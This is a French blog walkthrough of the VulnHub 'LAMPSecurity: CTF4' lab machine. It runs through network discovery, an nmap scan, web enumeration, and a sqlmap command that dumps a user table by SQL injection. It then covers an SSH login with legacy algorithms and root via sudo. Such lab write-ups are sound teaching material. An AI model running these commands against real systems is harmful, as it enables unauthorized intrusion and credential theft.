Aujourd’hui, nous allons nous attaquer au CTF LAMPSecurity: CTF4 que vous trouverez à cette adresse :
https://www.vulnhub.com/entry/lampsecurity-ctf4,83/
Pour rappel, on a généralement 4 phases dans un CTF :
- Reconnaissance
- Enumération
- Exploitation
- Escalade de privilèges
Reconnaissance :
On doit d’abord repérer la machine sur notre réseau :
netdiscover
![](https://blog.nohackme.com/wp-content/uploads/2023/03/Capture-decran-2023-03-21-a-21.26.17-1024x676.png)
La machine à attaquer est en 192.168.1.56 (paramètre variable suivant votre réseau).
Il est maintenant temps de regarder les ports qui sont ouverts à l’aide de la commande Nmap :
nmap -A 192.168.1.56
Rappel :
-A : Active la détection du système d’exploitation et des versions
![](https://blog.nohackme.com/wp-content/uploads/2023/03/Capture-decran-2023-03-21-a-21.36.29-1024x419.png)
On voit qu’il y a trois ports ouverts : 22 (SSH), 25 (SMTP) et 80 (HTTP). On commence assez souvent par regarder s’il y a un site internet.
Enumeration :
![](https://blog.nohackme.com/wp-content/uploads/2023/03/Capture-decran-2023-03-21-a-21.38.57-1024x680.png)
On va aller regarder le fichier robots.txt
![](https://blog.nohackme.com/wp-content/uploads/2023/03/Capture-decran-2023-03-21-a-21.44.07.png)
On trouve un SquirrelMail
![](https://blog.nohackme.com/wp-content/uploads/2023/03/Capture-decran-2023-03-21-a-21.46.49-1024x564.png)
Le répertoire « restricted » est protégé par un identifiant / mot de passe et le répertoire « conf » n’est pas accessible. On trouve un fichier « db.sql » dans le répertoire « sql »
![](https://blog.nohackme.com/wp-content/uploads/2023/03/Capture-decran-2023-03-21-a-21.48.49-1024x276.png)
Et enfin, une interface de connexion a la partie admin du site
![](https://blog.nohackme.com/wp-content/uploads/2023/03/Capture-decran-2023-03-21-a-21.52.05-1024x421.png)
Exploitation :
Donc on sait que le site utilise une base de données sql et qu’elle contient une base « ehks » et 3 tables « user » / « blog » / « comment ». Vous vous en doutez, c’est la table « user » qui va nous intéresser 🙂
sqlmap -u http://192.168.1.56/index.html?page=blog&title=Blog&id=2 -D ehks -T user –dump
![](https://blog.nohackme.com/wp-content/uploads/2023/03/Capture-decran-2023-03-21-a-22.02.42-1024x629.png)
Et bien voilà, on a récupéré le contenu de la table « user ». On va prendre le premier compte pour se connecter en ssh.
ssh dstevens@192.168.1.56
Pas moyen de se connecter et en cherchant un peu sur Internet on tombe sur cet article :
ssh dstevens@192.168.1.56 -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa
![](https://blog.nohackme.com/wp-content/uploads/2023/03/Capture-decran-2023-03-21-a-22.17.21-1024x274.png)
Escalade de privilèges :
Voyons ce que nous avons à disposition
sudo -l
sudo su
![](https://blog.nohackme.com/wp-content/uploads/2023/03/Capture-decran-2023-03-21-a-22.20.06-1024x400.png)
Et bien voilà, nous sommes « root » !